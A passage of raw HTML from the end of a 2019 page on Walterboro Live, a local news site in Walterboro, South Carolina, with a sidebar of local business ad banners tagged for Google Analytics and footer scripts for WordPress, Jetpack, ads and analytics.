2.00, 'non_interaction': true});" src="http://walterborolive.com/wp-content/uploads/2019/04/1ST-FEDERAL-SINGLE-WEB-4-2019.gif" /></a></div></div><div class="g g-4"><div class="g-col b-4 a-17"><a onClick="gtag('event', 'click', {'event_category': 'Adverts', 'event_label': 'Eder Chiropractic Center', 'value': 1.00,  'non_interaction': true});" href="https://www.facebook.com/EDER-CHIROPRACTIC-CENTER-267925429583/"><img onload="gtag('event', 'impression', {'event_category': 'Adverts', 'event_label': 'Eder Chiropractic Center', 'value': 2.00, 'non_interaction': true});" src="http://b8v.34a.myftpupload.com/wp-content/uploads/2016/08/EderChiropracticCenter.gif" /></a></div></div><div class="g g-4"><div class="g-col b-4 a-109"><a href="http://walterborolive.com/readerschoice2019/"><img src="http://walterborolive.com/wp-content/uploads/2019/10/Readers-Choice-Vote.gif" /></a></div></div><div class="g g-4"><div class="g-col b-4 a-104"><a href="http://www.memmingerchiro.com"><img src="http://walterborolive.com/wp-content/uploads/2019/10/MEMMINGER-CHIROPRACTIC-SINGLE-WEB-10-2019.gif" /></a></div></div><div class="g g-4"><div class="g-col b-4 a-110"><a href="https://www.facebook.com/Paul-Siegel-for-Walterboro-City-Council-212844575412265/"><img src="http://walterborolive.com/wp-content/uploads/2019/10/PAUL-SIEGEL-SINGLE-WEB-10-2019-1.gif" /></a></div></div><div class="g g-4"><div class="g-col b-4 a-27"><a onClick="gtag('event', 'click', {'event_category': 'Adverts', 'event_label': 'CMH Consulting Low Country Guns', 'value': 1.00,  'non_interaction': true});" href="http://lowcountryguns.com/"><img onload="gtag('event', 'impression', {'event_category': 'Adverts', 'event_label': 'CMH Consulting Low Country Guns', 'value': 2.00, 'non_interaction': true});" src="http://walterborolive.com/wp-content/uploads/2018/12/CMH-CONSTULTING•WEB-SINGLE-DECEMBER-2018.gif" /></a></div></div><div class="g g-4"><div class="g-col b-4 a-107"><a href="https://www.scpublicnotices.com/"><img src="http://walterborolive.com/wp-content/uploads/2019/10/SCPublicNotices_200x250.jpg" /></a></div></div><div class="g g-4"><div class="g-col b-4 a-18"><a onClick="gtag('event', 'click', {'event_category': 'Adverts', 'event_label': 'Palmetto Parcels', 'value': 1.00,  'non_interaction': true});" href="http://palmettoparcels.com/"><img onload="gtag('event', 'impression', {'event_category': 'Adverts', 'event_label': 'Palmetto Parcels', 'value': 2.00, 'non_interaction': true});" src="http://b8v.34a.myftpupload.com/wp-content/uploads/2016/08/PalmettoParcels.gif" /></a></div></div><div class="g g-4"><div class="g-col b-4 a-23"><a onClick="gtag('event', 'click', {'event_category': 'Adverts', 'event_label': 'Steedley Monument Works', 'value': 1.00,  'non_interaction': true});" href="http://steedleymonumentworks.com/"><img onload="gtag('event', 'impression', {'event_category': 'Adverts', 'event_label': 'Steedley Monument Works', 'value': 2.00, 'non_interaction': true});" src="http://b8v.34a.myftpupload.com/wp-content/uploads/2016/08/SteedleyMonumentWorks.gif" /></a></div></div><div class="g g-4"><div class="g-col b-4 a-94"><a href="https://fetterhealthcare.org/"><img src="http://walterborolive.com/wp-content/uploads/2019/02/Fetter-Single-Web-2-2019.gif" /></a></div></div><div class="g g-4"><div class="g-col b-4 a-28"><a onClick="gtag('event', 'click', {'event_category': 'Adverts', 'event_label': 'Carmichael Propane', 'value': 1.00,  'non_interaction': true});" href="https://www.carmichaelpropane.com"><img onload="gtag('event', 'impression', {'event_category': 'Adverts', 'event_label': 'Carmichael Propane', 'value': 2.00, 'non_interaction': true});" src="http://b8v.34a.myftpupload.com/wp-content/uploads/2017/06/CARMICHAEL-PROPANE-DOUBLE-WEB-1-16.gif" /></a></div></div><div class="g g-4"><div class="g-col b-4 a-30"><a onClick="gtag('event', 'click', {'event_category': 'Adverts', 'event_label': 'ReMax Southern Real Estate', 'value': 1.00,  'non_interaction': true});" href="http://www.ilovewalterboro.com/"><img onload="gtag('event', 'impression', {'event_category': 'Adverts', 'event_label': 'ReMax Southern Real Estate', 'value': 2.00, 'non_interaction': true});" src="http://walterborolive.com/wp-content/uploads/2019/10/Remax-Single-10-1-19.gif" /></a></div></div><div class="g g-4"><div class="g-col b-4 a-10"><a onClick="gtag('event', 'click', {'event_category': 'Adverts', 'event_label': 'Featured Homes Oswald-Cole', 'value': 1.00,  'non_interaction': true});" href="http://walterborolive.com/readerschoice2019/"><img onload="gtag('event', 'impression', {'event_category': 'Adverts', 'event_label': 'Featured Homes Oswald-Cole', 'value': 2.00, 'non_interaction': true});" src="http://walterborolive.com/wp-content/uploads/2019/10/OSWALD-ASSOCIATES-DOUBLE-WEB-10-1-19-3.gif" /></a></div></div><div class="g g-4"><div class="g-col b-4 a-26"><a onClick="gtag('event', 'click', {'event_category': 'Adverts', 'event_label': 'Clayton Homes of Walterboro', 'value': 1.00,  'non_interaction': true});" href="https://www.claytonhomes.com/"><img onload="gtag('event', 'impression', {'event_category': 'Adverts', 'event_label': 'Clayton Homes of Walterboro', 'value': 2.00, 'non_interaction': true});" src="http://b8v.34a.myftpupload.com/wp-content/uploads/2016/08/ClaytonHomesofWalterboro.gif" /></a></div></div><div class="g g-4"><div class="g-col b-4 a-106"><a href="http://simplyyoursinteriors.com"><img src="http://walterborolive.com/wp-content/uploads/2019/08/Simply-Yours-Interiors-Single-8-19-19-1.gif" /></a></div></div><div class="g g-4"><div class="g-col b-4 a-14"><a onClick="gtag('event', 'click', {'event_category': 'Adverts', 'event_label': 'Treasure Chest Gold Co.', 'value': 1.00,  'non_interaction': true});" href="https://www.facebook.com/Treasure-Chest-Gold-Co-111337075549849/?fref=ts"><img onload="gtag('event', 'impression', {'event_category': 'Adverts', 'event_label': 'Treasure Chest Gold Co.', 'value': 2.00, 'non_interaction': true});" src="http://walterborolive.com/wp-content/uploads/2019/10/TREASURE-CHEST-SINGLE-WEB-10-2019.gif" /></a></div></div><div class="g g-4"><div class="g-col b-4 a-16"><a onClick="gtag('event', 'click', {'event_category': 'Adverts', 'event_label': 'Coach\&#039;s Landscaping &amp; Irrigation LLC', 'value': 1.00,  'non_interaction': true});" href="https://ajdg.solutions/"><img onload="gtag('event', 'impression', {'event_category': 'Adverts', 'event_label': 'Coach\&#039;s Landscaping &amp; Irrigation LLC', 'value': 2.00, 'non_interaction': true});" src="http://walterborolive.com/wp-content/uploads/2018/10/COACHS-LANDSCAPING-SINGLE-WEB-2016.gif" /></a></div></div><div class="g g-4"><div class="g-col b-4 a-101"><a href="https://www.facebook.com/Wiggins-Portable-Buildings-123821050967695/?__tn__=%2Cd%2CP-R&eid=ARDi7QeiPN9X7xEl7fnfqMBwxXDDxtXRUOQYt1YITsDK1uBvPes8avTT5g6-vnW9b8syuUZJ7ZHYNegm"><img src="http://walterborolive.com/wp-content/uploads/2019/06/Wiggins-Portable-Buildings-Single-Web-6-2019.gif" /></a></div></div><div class="g g-4"><div class="g-col b-4 a-59"><a onClick="gtag('event', 'click', {'event_category': 'Adverts', 'event_label': 'Coastal Air', 'value': 1.00,  'non_interaction': true});" href="https://ajdg.solutions/"><img onload="gtag('event', 'impression', {'event_category': 'Adverts', 'event_label': 'Coastal Air', 'value': 2.00, 'non_interaction': true});" src="http://b8v.34a.myftpupload.com/wp-content/uploads/2016/09/COASTAL-AIR-SINGLE-WEB-10-16.gif" /></a></div></div><div class="g g-4"><div class="g-col b-4 a-111"><img src="http://walterborolive.com/wp-content/uploads/2019/10/THE-SHOP-SINGLE-WEB-10-19.gif" /></a></div></div><div class="g g-4"><div class="g-col b-4 a-20"><a onClick="gtag('event', 'click', {'event_category': 'Adverts', 'event_label': 'Louie\&#039;s Liquor And Fine Wine', 'value': 1.00,  'non_interaction': true});" href="https://www.facebook.com/groups/louiesliquorwalterborosc/"><img onload="gtag('event', 'impression', {'event_category': 'Adverts', 'event_label': 'Louie\&#039;s Liquor And Fine Wine', 'value': 2.00, 'non_interaction': true});" src="http://b8v.34a.myftpupload.com/wp-content/uploads/2016/08/LouiesLiquor.gif" /></a></div></div><div class="g g-4"><div class="g-col b-4 a-83"><a onClick="gtag('event', 'click', {'event_category': 'Adverts', 'event_label': 'Smoak Hudson Law Firm', 'value': 1.00,  'non_interaction': true});" href="http://www.smoakhudsonlaw.com/"><img onload="gtag('event', 'impression', {'event_category': 'Adverts', 'event_label': 'Smoak Hudson Law Firm', 'value': 2.00, 'non_interaction': true});" src="http://b8v.34a.myftpupload.com/wp-content/uploads/2018/03/SMOAK-HUDSON-LAW-FIRM-SINGLE-WEB-3-21-2018-1.gif" /></a></div></div><div class="g g-4"><div class="g-col b-4 a-60"><a onClick="gtag('event', 'click', {'event_category': 'Adverts', 'event_label': 'Walterboro Ford', 'value': 1.00,  'non_interaction': true});" href="http://www.walterboroford.com/"><img onload="gtag('event', 'impression', {'event_category': 'Adverts', 'event_label': 'Walterboro Ford', 'value': 2.00, 'non_interaction': true});" src="http://walterborolive.com/wp-content/uploads/2019/09/WALTERBORO-FORD-SINGLE-WEB-9-13-2019.gif" /></a></div></div></div></div>
  </div>

  <footer id="footerCont">
    <div class="row-fluid">
  <div class="span12">
    <div class="textwidget custom-html-widget"><!-- code from Primis - news - Smithnewspapers collapsing -->
<script type="text/javascript" language="javascript" src="https://live.sekindo.com/live/liveView.php?s=100005&cbuster=[CACHE_BUSTER]&pubUrl=[PAGE_URL_ENCODED]&x=[WIDTH]&y=[HEIGHT]&vp_content=plembed146dkrnmltxh&vp_template=5886&subId=[SUBID_ENCODED]"></script>
<!-- code from Primis --></div>			<div class="textwidget"><h3><a href="http://walterborolive.com/privacy-policy-for-walterborolive-com/" target="_blank" rel="noopener noreferrer">Privacy Policy</a></h3>
</div>
		  </div>
</div><!--.row-fluid-->  </footer>
  
  </div><!--.container-->
  <div class="row-fluid">
    <div class="span12">
      <p class="copyrightCont">&copy; Copyright 2019 | Walterboro Live</p>
    </div>
  </div>
  	<div style="display:none">
	</div>
<script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201945'></script>
<script type='text/javascript' src='https://secure.gravatar.com/js/gprofiles.js?ver=2019Novaa'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var WPGroHo = {"my_hash":""};
/* ]]> */
</script>
<script type='text/javascript' src='http://walterborolive.com/wp-content/plugins/jetpack/modules/wpgroho.js?ver=5.2.4'></script>
<script type='text/javascript' src='http://walterborolive.com/wp-includes/js/wp-embed.min.js?ver=5.2.4'></script>
<script async="async" type='text/javascript' src='http://walterborolive.com/wp-content/plugins/akismet/_inc/form.js?ver=4.1.2'></script>
<script type='text/javascript' src='https://stats.wp.com/e-201945.js' async='async' defer='defer'></script>
<script type='text/javascript'>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:7.7.1',blog:'89385233',post:'84735',tz:'-5',srv:'walterborolive.com'} ]);
	_stq.push([ 'clickTrackerInit', '89385233', '84735' ]);
</script>
  <script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.2/js/bootstrap.min.js"></script>
  
  <script>
	var children = jQuery('#menu-header-menu').children().length;
	jQuery(function(){
		if (children > 1) {
			var theMath = 100 / children;
			jQuery('#menu-header-menu li').css('width', theMath +'%');
		}
	});
  </script>
  
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-123779972-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-123779972-1');
</script>

  </body>
 
</html>